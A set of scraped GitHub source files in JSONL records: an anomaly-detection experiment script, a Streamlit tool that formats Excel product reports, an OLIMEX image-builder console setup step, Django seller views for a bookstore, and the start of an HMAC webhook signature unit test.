self.anomalib_dataset = True\n else:\n self.subsets = [None]\n self.anomalib_dataset = False\n \n self.verbose= verbose\n self.model = None\n\n def initialize_model(self, current_subset):\n self.current_subset = current_subset\n self.subset_results = []\n if self.args.model == 'ae_flow': self.model = AE_Flow_Model(subnet_architecture=self.args.subnet_architecture, n_flowblocks=self.args.n_flowblocks)\n elif self.args.model == 'fastflow':\n if self.dataset in ['btech', 'mvtec']:\n input_size = (256, 256)\n else:\n input_size = (224, 224)\n self.model = FastflowModel(input_size=input_size, backbone=\"wide_resnet50_2\", flow_steps=8, pre_trained=False)\n self.model.training = True\n\n elif self.args.model == 'autoencoder':\n self.model = AE_Model()\n else:\n raise NotImplementedError\n \n def load_data(self):\n\n if self.subsets != None: print(f'Running on subset: {self.current_subset}')\n self.train_loader, self.train_abnormal, self.test_loader = load(data_dir=self.args.dataset,batch_size=self.args.batch_size, num_workers=self.args.num_workers, subset=self.current_subset, anomalib_dataset=self.anomalib_dataset)\n self.train_split_normal, self.test_split_normal, self.train_split_abnormal, self.test_split_abnormal = split_data(n_splits=self.args.n_validation_folds, normal_data=self.train_loader, \n abnormal_data=self.train_abnormal)\n\n test_split_normal_all = [item for sublist in self.test_split_normal for item in sublist]\n test_split_abnormal_all = [item for sublist in self.test_split_abnormal for item in sublist]\n\n test_split_normall = torch.utils.data.dataset.Subset(self.train_loader,test_split_normal_all)\n test_split_abnormall = torch.utils.data.dataset.Subset(self.train_abnormal,test_split_abnormal_all)\n self.checkpoint_loader = data.DataLoader(torch.utils.data.ConcatDataset([test_split_normall, test_split_abnormall]), num_workers = 3, batch_size=64)\n \n self.threshold_loader_all = data.DataLoader(torch.utils.data.ConcatDataset([self.train_loader, self.train_abnormal]), num_workers = 3, batch_size=64)\n \n def load_fold_data(self, fold):\n return fold_to_loaders(fold, self.train_split_normal, self.test_split_normal,self.train_split_abnormal, self.test_split_abnormal, self.args.num_workers, self.train_loader, self.train_abnormal)\n ","repo_name":"pimpraat/ae_flow","sub_path":"src/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72422354152","text":"import streamlit as st\r\nfrom streamlit_option_menu import option_menu\r\nimport os, sys\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom openpyxl import *\r\nfrom openpyxl import load_workbook\r\nfrom openpyxl.styles import Alignment, Border,Font, PatternFill, Side\r\nfrom openpyxl.utils.cell import get_column_letter\r\n\r\nst.set_page_config(\r\n page_title=\"GPIM Automation Hub\",\r\n layout=\"centered\",\r\n initial_sidebar_state=\"auto\", \r\n)\r\n\r\nhide_st_style = '''\r\n '''\r\nst.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\nif 'greeting' not in st.session_state:\r\n st.session_state.greeting = \"Hello, there!\"\r\n# st.write(st.session_state)\r\n\r\nwith st.sidebar:\r\n selected = option_menu(menu_title=None, options = [\"GDID\", \"Settings\"], \r\n icons=['file-earmark-fill', 'gear'], menu_icon=\"list\", default_index=0) # orientation=\"horizontal\"\r\n\r\n\r\nwb0 = load_workbook(\"Settings.xlsx\", data_only=True)\r\nws0 = wb0.active\r\n\r\nmain_locales = []\r\nfor x in range(2, ws0.max_column + 1):\r\n if not x == \"\":\r\n main_locales.append(ws0.cell(row=2, column=x).value)\r\n\r\ndownload_folder = ws0[\"B1\"].value # Default download location\r\n\r\nif selected == \"Settings\": \r\n col1, col2, col3 = st.columns(3)\r\n with col3:\r\n openxl = st.button(\"Open Settings file\", type=\"secondary\", use_container_width=True)\r\n if openxl:\r\n os.startfile(\"Settings.xlsx\") \r\n\r\n tab1, tab2 = st.tabs([\"GDID template Generator\",\"Coming soon\"])\r\n with tab1:\r\n col1, col2 = st.columns(2) \r\n with col1:\r\n new_locale = st.text_input(\"Add any new Locale here.\", key=\"new_locale\", placeholder=\"Add any new Locale here.\", label_visibility=\"collapsed\")\r\n with col2: \r\n new_location = st.text_input(\"Update your download location here.\", key=\"new_location\", placeholder=\"Update your download location here.\", label_visibility=\"collapsed\")\r\n\r\n saved = st.button(\"Save\", type=\"primary\", use_container_width=True)\r\n if saved:\r\n if not new_locale == \"\":\r\n if new_locale not in main_locales:\r\n ws0.cell(row=2, column= ws0.max_column + 1).value = new_locale\r\n wb0.save(\"Settings.xlsx\")\r\n st.info(\"New settings are saved.\", icon=\"ℹ️\")\r\n else:\r\n st.warning(\"Locale already exists.\", icon=\"ℹ️\")\r\n\r\n if not new_location == \"\": \r\n if not new_location == download_folder:\r\n ws0[\"B1\"].value = new_location\r\n wb0.save(\"Settings.xlsx\")\r\n st.info(\"New settings are saved.\", icon=\"ℹ️\")\r\n else:\r\n st.warning(\"Default download location is the same.\", icon=\"ℹ️\")\r\n\r\n\r\nif selected == \"GDID\": \r\n st.title(\"GDID template Generator\")\r\n st.write(\"######\")\r\n\r\n locale = st.selectbox('Please select the main Locale.', (main_locales))\r\n st.write(\"######\")\r\n uploaded_file = st.file_uploader(\"Please upload 'GDID' report and click 'Generate' button below.\", type=[\"xlsx\"], accept_multiple_files=False, label_visibility=\"visible\")\r\n submitted = st.button(\"Generate\", type=\"primary\", use_container_width=True) \r\n\r\n if submitted:\r\n if uploaded_file is not None:\r\n filename = str(uploaded_file.name) \r\n if not filename.find(\"GDID\") == -1:\r\n df0 = pd.read_excel( uploaded_file, sheet_name=0, engine='openpyxl')\r\n\r\n rows_cnt = df0.shape[0] # Number of Rows == rows_cnt\r\n skus = list(df0['SKU'])\r\n st.write(\"SKU Count :\", rows_cnt)\r\n\r\n if df0['SKU'].isnull().sum() == rows_cnt: \r\n df0.insert(4, '10/11?', np.nan)\r\n else:\r\n df0.insert(4, '10/11?', list(map(lambda x: len(str(x)), skus)))\r\n\r\n headers0 = list(df0.columns.values)\r\n locale_included = [col for col in headers0 if locale in col]\r\n if len(locale_included) == 0:\r\n st.warning(\"Report does NOT contain the main Locale.\", icon=\"ℹ️\")\r\n sys.exit()\r\n \r\n headers1 = headers0.copy()\r\n headers1.remove('Division')\r\n headers1.remove('Commodity Class')\r\n headers1.remove('GPH Path')\r\n headers1.remove('Marketplace Formal Name')\r\n\r\n st.write(\"Started arranging columns in order!\")\r\n mpfns=[]; dscs=[]; ldscs=[]; b1s=[]; b2s=[]; b3s=[]; b4s=[]; b5s=[]; b6s=[]; b7s=[]; b8s=[]; b9s=[]; b10s=[]; b11s=[]; b12s=[]; b13s=[]; b14s=[]; b15s=[]; pics1=[]; pics2=[]; docs=[]; brnds=[]; mkt1s=[]; mkt2s=[]; mkt3s=[]\r\n for i in headers0: # Split columns by Attributes(column names) required to update Values for\r\n if i.endswith(\" — Marketplace Formal Name\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n mpfns.insert(0, i) # Move the column of target locale to the first item in the list\r\n else:\r\n mpfns.append(i)\r\n elif i.endswith(\" — Marketplace Description\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n dscs.insert(0, i)\r\n else:\r\n dscs.append(i)\r\n elif i.endswith(\" — Marketplace Description Extended\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n ldscs.insert(0, i)\r\n else:\r\n ldscs.append(i)\r\n elif i.endswith(\" — Bullet 1\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b1s.insert(0, i)\r\n else:\r\n b1s.append(i) # List for Bullet 1 columns\r\n elif i.endswith(\" — Bullet 2\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b2s.insert(0, i)\r\n else:\r\n b2s.append(i)\r\n elif i.endswith(\" — Bullet 3\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b3s.insert(0, i)\r\n else:\r\n b3s.append(i)\r\n elif i.endswith(\" — Bullet 4\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b4s.insert(0, i)\r\n else:\r\n b4s.append(i)\r\n elif i.endswith(\" — Bullet 5\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b5s.insert(0, i)\r\n else:\r\n b5s.append(i)\r\n elif i.endswith(\" — Bullet 6\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b6s.insert(0, i)\r\n else:\r\n b6s.append(i)\r\n elif i.endswith(\" — Bullet 7\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b7s.insert(0, i)\r\n else:\r\n b7s.append(i)\r\n elif i.endswith(\" — Bullet 8\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b8s.insert(0, i)\r\n else:\r\n b8s.append(i)\r\n elif i.endswith(\" — Bullet 9\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b9s.insert(0, i)\r\n else:\r\n b9s.append(i)\r\n elif i.endswith(\" — Bullet 10\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b10s.insert(0, i)\r\n else:\r\n b10s.append(i)\r\n elif i.endswith(\" — Bullet 11\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b11s.insert(0, i)\r\n else:\r\n b11s.append(i)\r\n elif i.endswith(\" — Bullet 12\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b12s.insert(0, i)\r\n else:\r\n b12s.append(i)\r\n elif i.endswith(\" — Bullet 13\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b13s.insert(0, i)\r\n else:\r\n b13s.append(i)\r\n elif i.endswith(\" — Bullet 14\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b14s.insert(0, i)\r\n else:\r\n b14s.append(i)\r\n elif i.endswith(\" — Bullet 15\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n b15s.insert(0, i)\r\n else:\r\n b15s.append(i)\r\n elif i.endswith(\" — Brand\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n brnds.insert(0, i)\r\n else:\r\n brnds.append(i)\r\n elif i.endswith(\"FUZE Market Level 1\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n mkt1s.insert(0, i)\r\n else:\r\n mkt1s.append(i)\r\n elif i.endswith(\"FUZE Market Level 2\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n mkt2s.insert(0, i)\r\n else:\r\n mkt2s.append(i)\r\n elif i.endswith(\"FUZE Market Level 3\"):\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n mkt3s.insert(0, i)\r\n else:\r\n mkt3s.append(i)\r\n elif not i.find(\" — Main Picture\") == -1:\r\n headers1.remove(i)\r\n if not i.find(locale) == -1:\r\n pics1.insert(0, i)\r\n else:\r\n pics1.append(i) \r\n\r\n headers2 = headers1.copy()\r\n for j in headers1: # Remove columns of Null Values\r\n if j in ['10/11?', 'Commodity Class', 'Variant SKU', 'SKU']:\r\n continue\r\n if df0[j].isnull().sum() == rows_cnt:\r\n headers2.remove(j)\r\n\r\n headers3 = headers2.copy()\r\n for k in headers2: \r\n if not k.find(\" — Additional Picture\") == -1:\r\n headers3.remove(k)\r\n pics2.append(k)\r\n elif not k.find(\" — Doc\") == -1:\r\n headers3.remove(k)\r\n docs.append(k)\r\n\r\n bullets0 = [b5s, b6s, b7s, b8s, b9s, b10s, b11s, b12s, b13s, b14s, b15s] \r\n bullets1 = bullets0.copy()\r\n mkts0 = [mkt2s, mkt3s]\r\n mkts1 = mkts0.copy()\r\n\r\n for bullet in bullets0: # to check if Vales are available for each Attribute and delte the relevant columns \r\n nan1 = df0[bullet].isnull().sum()\r\n if nan1.sum()/len(nan1) == rows_cnt:\r\n bullets1.remove(bullet)\r\n bullets2 = [second for first in bullets1 for second in first]\r\n\r\n for mkt in mkts0:\r\n nan3 = df0[mkt].isnull().sum()\r\n if nan3.sum()/len(nan3) == rows_cnt:\r\n mkts1.remove(mkt) \r\n mkts2 = [second for first in mkts1 for second in first]\r\n st.write(\"Columns of Null values are deleted.\")\r\n \r\n headers3[5:5] = docs\r\n headers3[5:5] = pics2\r\n headers3[5:5] = brnds\r\n headers3[5:5] = mkts2\r\n headers3[5:5] = mkt1s\r\n headers3[5:5] = pics1\r\n headers3[5:5] = bullets2\r\n headers3[5:5] = b4s\r\n headers3[5:5] = b3s\r\n headers3[5:5] = b2s\r\n headers3[5:5] = b1s\r\n if not df0[ldscs].isnull().sum().sum()/len(df0[ldscs].isnull().sum()) == rows_cnt:\r\n headers3[5:5] = ldscs\r\n headers3[5:5] = dscs\r\n headers3[5:5] = mpfns\r\n headers3.insert(1, 'GPH Path')\r\n headers3.insert(1, 'Commodity Class')\r\n headers3.insert(1, 'Division')\r\n st.write(\"The rest of columns are now reordered.\")\r\n \r\n df1 = df0[headers3]\r\n df1 = df1.astype({\"Base SKU\": 'str'})\r\n df1.sort_values(by='Base SKU', ascending=True, inplace=True) # Sort by Base coulmn\r\n df1.to_excel(\"Digitization Template.xlsx\", index=False)\r\n\r\n wb = load_workbook(\"Digitization Template.xlsx\", data_only=True)\r\n ws = wb.active \r\n\r\n ws.insert_rows(1) # for validation/gap filling required \r\n ws.row_dimensions[2].height = 40\r\n for r1 in range(3, ws.max_row + 1):\r\n ws.row_dimensions[r1].height = 20 \r\n\r\n for c1 in range(1, ws.max_column + 1): # Set styles for header rows (row 2)\r\n ws.cell(row=2, column=c1).fill = PatternFill(fgColor=\"D4D4D4\", fill_type=\"solid\")\r\n ws.cell(row=2, column=c1).font = Font(name=\"Arial\", size=9, bold=True, color=\"000000\")\r\n ws.cell(row=2, column=c1).alignment = Alignment(horizontal=\"center\",wrap_text=True)\r\n ws.cell(row=2, column=c1).border = Border(left=Side(style=\"thin\", color=\"808080\"), right=Side(style=\"thin\", color=\"808080\"),top=Side(style=\"thin\", color=\"808080\"),bottom=Side(style=\"thin\", color=\"808080\"))\r\n\r\n ws.column_dimensions[\"A\"].width = 8\r\n ws.column_dimensions[\"H\"].width = 8 \r\n for c2 in range(2, 8):\r\n ws.column_dimensions[get_column_letter(c2)].width = 12\r\n \r\n for c3 in range(9, ws.max_column + 1):\r\n if ws.cell(row=2, column=c3).value == \"Locale\":\r\n break\r\n ws.column_dimensions[get_column_letter(c3)].width = 20\r\n if not ws.cell(row=2, column=c3).value.find(locale) == -1:\r\n ws.cell(row=2, column=c3).fill = PatternFill(fgColor=\"FFC000\", fill_type=\"solid\")\r\n \r\n mpfns_idx=[]; dscs_idx=[]; b1s_idx=[]; b2s_idx=[]; b2s_idx=[]; b3s_idx=[]; b4s_idx=[]; pics1_idx=[]; mkt1s_idx=[]; vals=[]\r\n for idx, attr in enumerate(ws[2]):\r\n if attr.value in mpfns:\r\n mpfns_idx.append(idx+1)\r\n elif attr.value in dscs:\r\n dscs_idx.append(idx+1)\r\n elif attr.value in b1s:\r\n b1s_idx.append(idx+1)\r\n elif attr.value in b2s:\r\n b2s_idx.append(idx+1)\r\n elif attr.value in b3s:\r\n b3s_idx.append(idx+1)\r\n elif attr.value in b4s:\r\n b4s_idx.append(idx+1)\r\n elif attr.value in pics1:\r\n pics1_idx.append(idx+1)\r\n elif attr.value in mkt1s:\r\n mkt1s_idx.append(idx+1)\r\n\r\n def coloring (mindx, maxdx):\r\n for row in ws.iter_rows(min_row=3, max_row=ws.max_row, min_col=mindx, max_col=maxdx):\r\n if not row[0].value is None: \r\n continue\r\n vals.clear() \r\n for cell in row: \r\n if not cell.value is None:\r\n vals.append(cell.value)\r\n if len(vals) < 1:\r\n row[0].fill = PatternFill(fgColor=\"FECCCC\", fill_type=\"solid\") # Color the Target Locale Cell RED\r\n else:\r\n row[0].fill = PatternFill(fgColor=\"FFF1CD\", fill_type=\"solid\") # Color the Target Locale Cell YELLOW \r\n\r\n coloring (mpfns_idx[0], mpfns_idx[-1])\r\n coloring (dscs_idx[0], dscs_idx[-1])\r\n coloring (b1s_idx[0], b1s_idx[-1])\r\n coloring (b2s_idx[0], b2s_idx[-1])\r\n coloring (b3s_idx[0], b3s_idx[-1])\r\n coloring (b4s_idx[0], b4s_idx[-1])\r\n coloring (pics1_idx[0], pics1_idx[-1])\r\n coloring (mkt1s_idx[0], mkt1s_idx[-1])\r\n\r\n label_cols = [mpfns_idx[0], dscs_idx[0], b1s_idx[0], b2s_idx[0], b2s_idx[0], b3s_idx[0], b4s_idx[0], pics1_idx[0], mkt1s_idx[0]]\r\n for c4 in label_cols: # Set styles for columns for Target Locale (Labeling) \r\n ws.cell(row=1, column=c4).fill = PatternFill(fgColor=\"002060\", fill_type=\"solid\")\r\n ws.cell(row=1, column=c4).value = 'Validation/Gap Filling Required'\r\n ws.cell(row=1, column=c4).font = Font(name= \"Arial\", size=9, color=\"FFFFFF\")\r\n ws.cell(row=1, column=c4).alignment = Alignment(horizontal=\"center\",wrap_text=True)\r\n st.write(\"Styles for header rows & color coding for blank cells are applied.\")\r\n \r\n st.write(\"Just started applying styles for the data cells.\")\r\n for row2 in ws.iter_rows(min_row=3, max_row=ws.max_row, min_col=1, max_col = ws.max_column):\r\n for cell2 in row2:\r\n cell2.alignment = Alignment(wrap_text=True)\r\n cell2.font = Font(name=\"Arial\", size=9) \r\n cell2.border = Border(left=Side(style=\"thin\", color=\"808080\"), right=Side(style=\"thin\", color=\"808080\"),top=Side(style=\"thin\", color=\"808080\"),bottom=Side(style=\"thin\", color=\"808080\")) \r\n\r\n ws.freeze_panes = ws[\"I3\"]\r\n ws.auto_filter.ref = \"A2:{}{}\".format(get_column_letter(ws.max_column), ws.max_row)\r\n \r\n wb.save(\"Digitization Template.xlsx\")\r\n os.startfile(\"Digitization Template.xlsx\")\r\n else:\r\n st.warning(\"You may have uploded a wrong report.\", icon=\"ℹ️\")\r\n else:\r\n st.warning(\"Please upload GDID report first.\", icon=\"ℹ️\")\r\n\r\n","repo_name":"SeongjoRa/gdid","sub_path":"gdid.py","file_name":"gdid.py","file_ext":"py","file_size_in_byte":20072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9805630348","text":"import olimage.environment as env\n\nfrom olimage.core.io import Console\nfrom olimage.core.utils import Utils\n\nfrom .base import SetupAbstract\n\n\nclass SetupConsole(SetupAbstract):\n\n def setup(self, keymap: str, layout: str):\n\n # Configure console\n with Console(\"Generating console configuration\"):\n Utils.shell.chroot(\n 'bash -c \\'\\\n echo \"console-setup console-setup/charmap47 select UTF-8\" | debconf-set-selections -v; \\\n echo \"console-setup console-setup/codeset47 select Guess optimal character set\\\" | debconf-set-selections -v; \\\n echo \"console-setup console-setup/fontface47 select Do not change the boot/kernel font\" | debconf-set-selections -v\\\n \\''\n )\n\n # Configure keyboard\n with Console(\"Generating keyboard configuration: \\'{}\\'\".format(keymap)):\n Utils.shell.chroot(\n 'bash -c \\'\\\n echo \"keyboard-configuration keyboard-configuration/altgr select The default for the keyboard layout\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/model select Generic 105-key (Intl) PC\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/xkb-keymap select {}\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/compose\tselect No compose key\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/ctrl_alt_bksp boolean true\" | debconf-set-selections -v; \\\n echo \"keyboard-configuration keyboard-configuration/variant select {}\" | debconf-set-selections -v\\\n \\''.format(keymap, layout)\n )\n\n # Install package\n with Console(\"Installing packages\"):\n Utils.shell.chroot('apt-get install -y {}'.format(' '.join(self.packages)))\n\n # Run configuration\n with Console(\"Running setup\"):\n Utils.install('/etc/default/console-setup')\n Utils.shell.chroot('setupcon --force --save-only -v')\n","repo_name":"OLIMEX/olimage","sub_path":"olimage/core/setup/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"30743759045","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import PermissionDenied\nfrom django.contrib.auth.decorators import login_required\nimport datetime\nfrom django.utils import timezone\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom helper import random_alphanumeric as ran\nfrom django.core.mail import send_mail, EmailMessage\nfrom easy_ecom import settings_sensitive\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import StoreSelectForm, NewBookForm, NewBookISBNCheckForm, ItemForm, NewBookAuthorForm, \\\n NewBookPublisherForm, InventoryForm, NewAuthorForm, NewPublisherForm\nfrom accounts.forms import AddressForm\nfrom store.models import BookStore, Item, Author, Publisher, Inventory\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom helper import custom_http\n\n# Create your views here.\n@login_required()\ndef dashboardView(request):\n return render(request, 'sell/dashboard.html', {})\n\n@login_required()\ndef newView(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = StoreSelectForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n print(request.POST.get('store_names'))\n if request.POST.get('store_names') == 'Books':\n return HttpResponseRedirect(reverse('sell:newBookCheck'))\n\n return HttpResponseRedirect(reverse('sell:new'))\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = StoreSelectForm()\n\n return render(request, \"sell/new.html\", {'storeForm': form})\n\n@login_required()\ndef editView(request):\n return HttpResponse(\"seller editView\")\n\n@login_required()\ndef addNewBook(request, isbn):\n store_name = \"Books\"\n try:\n if len(str(int(isbn))) == 13: #double checking isbn format, since a direct request to this url could break our desired outcome.\n BookStore.objects.get(pk=isbn)\n else:\n raise PermissionDenied\n except ObjectDoesNotExist:\n pass\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n bookForm = NewBookForm(request.POST)\n itemForm = ItemForm(request.POST, store=store_name)\n authorForm = NewBookAuthorForm(request.POST)\n publisherForm = NewBookPublisherForm(request.POST)\n # check whether it's valid:\n if bookForm.is_valid() and itemForm.is_valid() and authorForm.is_valid() and publisherForm.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n\n title = itemForm.cleaned_data['title']\n description = itemForm.cleaned_data['description']\n shipping_product_dimension_height = itemForm.cleaned_data['shipping_product_dimension_height']\n shipping_product_dimension_width = itemForm.cleaned_data['shipping_product_dimension_width']\n shipping_product_dimension_length = itemForm.cleaned_data['shipping_product_dimension_length']\n shipping_product_dimension_units = itemForm.cleaned_data['shipping_product_dimension_units']\n shipping_product_weight = itemForm.cleaned_data['shipping_product_weight']\n shipping_product_weight_units = itemForm.cleaned_data['shipping_product_weight_units']\n category = itemForm.cleaned_data['category']\n item = Item.objects.create(title= title, description= description, shipping_product_dimension_height= shipping_product_dimension_height,\n shipping_product_dimension_width= shipping_product_dimension_width, shipping_product_dimension_length= shipping_product_dimension_length,\n shipping_product_dimension_units= shipping_product_dimension_units, shipping_product_weight= shipping_product_weight,\n shipping_product_weight_units= shipping_product_weight_units)\n item.category.add(*category)\n\n isbn_10 = bookForm.cleaned_data['isbn_10']\n isbn_13 = bookForm.cleaned_data['isbn_13']\n language = bookForm.cleaned_data['language']\n publisher = publisherForm.cleaned_data['name']\n\n book = BookStore.objects.create(isbn_10=isbn_10, isbn_13=isbn_13, language=language,\n item=item, publisher= publisher)\n authors = authorForm.cleaned_data['name']\n book.authors.add(*authors)\n\n return HttpResponseRedirect(reverse('sell:newInventory') + '?store_name=' + store_name + '&isbn_13=' + isbn_13)\n # if a GET (or any other method) we'll create a blank form\n else:\n bookForm = NewBookForm()\n itemForm = ItemForm(store=\"Books\")\n authorForm = NewBookAuthorForm()\n publisherForm = NewBookPublisherForm()\n return render(request, \"sell/new_book.html\",\n {'bookForm' : bookForm, 'itemForm': itemForm, 'authorForm': authorForm, 'publisherForm': publisherForm,\n 'isbn': isbn})\n\nclass StoreNotFoundException(Exception):\n pass\n\n@login_required()\ndef newInventory(request):\n try: #Proceed only if object exists for that store.\n store_name= request.GET['store_name']\n #retrieve item object as well\n if store_name == \"Books\":\n isbn_13 = request.GET['isbn_13']\n book = BookStore.objects.get(isbn_13=isbn_13)\n item = book.item\n else:\n raise StoreNotFoundException\n if len(Inventory.objects.filter(item = item, seller=request.user)) != 0:\n return render(request, 'sell/new_inventory_present_already.html', {})\n except (ObjectDoesNotExist, StoreNotFoundException) as e:\n print(e)\n raise PermissionDenied\n\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n inventoryForm = InventoryForm(request.POST, user= request.user.userextended)\n # check whether it's valid:\n if inventoryForm.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n price = inventoryForm.cleaned_data['price']\n # currency--> # make a dict to map country and currency\n total_available_stock = inventoryForm.cleaned_data['total_available_stock']\n address = inventoryForm.cleaned_data['address']\n available_countries = inventoryForm.cleaned_data['available_countries']\n domestic_shipping_company = inventoryForm.cleaned_data['domestic_shipping_company']\n domestic_shipping_cost = inventoryForm.cleaned_data['domestic_shipping_cost']\n free_domestic_shipping = inventoryForm.cleaned_data['free_domestic_shipping']\n international_shipping_company = inventoryForm.cleaned_data['international_shipping_company']\n international_shipping_cost = inventoryForm.cleaned_data['international_shipping_cost']\n free_international_shipping = inventoryForm.cleaned_data['free_international_shipping']\n local_pick_up_accepted = inventoryForm.cleaned_data['local_pick_up_accepted']\n dispatch_max_time = inventoryForm.cleaned_data['dispatch_max_time']\n return_accepted = inventoryForm.cleaned_data['return_accepted']\n listing_end_datetime = inventoryForm.cleaned_data['listing_end_datetime']\n condition = inventoryForm.cleaned_data['condition']\n\n Inventory.objects.create(item=item, seller=request.user, price=price, total_available_stock= total_available_stock,\n item_location= address, available_countries= available_countries,\n domestic_shipping_company= domestic_shipping_company, domestic_shipping_cost= domestic_shipping_cost,\n free_domestic_shipping= free_domestic_shipping, international_shipping_company=international_shipping_company,\n free_international_shipping=free_international_shipping, local_pick_up_accepted= local_pick_up_accepted,\n dispatch_max_time= dispatch_max_time, return_accepted= return_accepted,\n listing_end_datetime= listing_end_datetime, condition= condition, international_shipping_cost=international_shipping_cost,\n\n )\n\n # redirect to item page:\n return render(request, 'sell/new_inventory_added.html', {})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n inventoryForm = InventoryForm(user= request.user.userextended)\n return render(request, 'sell/new_inventory.html', {'inventoryForm': inventoryForm, 'get_params': custom_http.get_from_request_GET(request)})\n\n@login_required()\ndef addNewBookPKCheck(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = NewBookISBNCheckForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n isbn = form.cleaned_data['isbn']\n try:\n book = BookStore.objects.get(pk=isbn)\n #if found, redirect him to add as a seller in the listing\n get = '?store=Books&id=book.pk'\n return HttpResponse(reverse('sell:newInventory')+ get)\n # print(\"add him to the inventory\")\n except Exception:\n #if not found, create a new book\n return HttpResponseRedirect(reverse('sell:newBook', kwargs= {'isbn' : isbn}))\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = NewBookISBNCheckForm()\n\n return render(request, \"sell/new_book_isbn_check.html\", {'isbnCheckForm': form})\n\n@login_required()\ndef newAuthor(request):\n pass\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = NewAuthorForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n name = form.cleaned_data['name']\n Author.objects.create(name = name, created_by = request.user)\n return render(request, 'sell/new_author_added.html', {'form': form})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = NewAuthorForm()\n\n return render(request, 'sell/new_author.html', {'form': form})\n\n@login_required()\ndef newPublisher(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = NewPublisherForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n name = form.cleaned_data['name']\n Publisher.objects.create(name = name, created_by = request.user)\n return render(request, 'sell/new_publisher_added.html', {'form': form})\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = NewPublisherForm()\n\n return render(request, 'sell/new_publisher.html', {'form': form})","repo_name":"bharathramh92/easy-ecom","sub_path":"sell/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14434767867","text":"import unittest\nimport hashlib\nimport hmac\nimport base64\n\n\nclass TestHMACEncryption(unittest.TestCase):\n def setUp(self):\n super().setUp()\n self.API_SECRET_KEY = \"API_SECRET_CLIENT1\"\n self.digest_mode = hashlib.sha256\n\n self.payload = '''\n{\n \"event\": \"SERVER_UPDATE\",\n \"updates\": [\n {\n \"item\": \"gadgets\",\n \"action\": \"add\",\n \"quantity\": 20\n },\n {\n \"item\": \"widgets\",\n \"action\": \"remove\",\n \"quantity\": 10\n }\n ]\n}'''\n\n def test_hmac_encryption(self):\n # creating a cryptographic hash of the webhook payload\n # This unique signature will be sent in the header\n\n hmac_result = hmac.new(\n self.API_SECRET_KEY.encode('utf-8'),\n self.payload.encode('utf-8'),\n digestmod=hashlib.sha256)\n\n hmac_digest = hmac_result.digest()\n\n computed_mac = base64.b64encode(hmac_digest)\n expected_result = 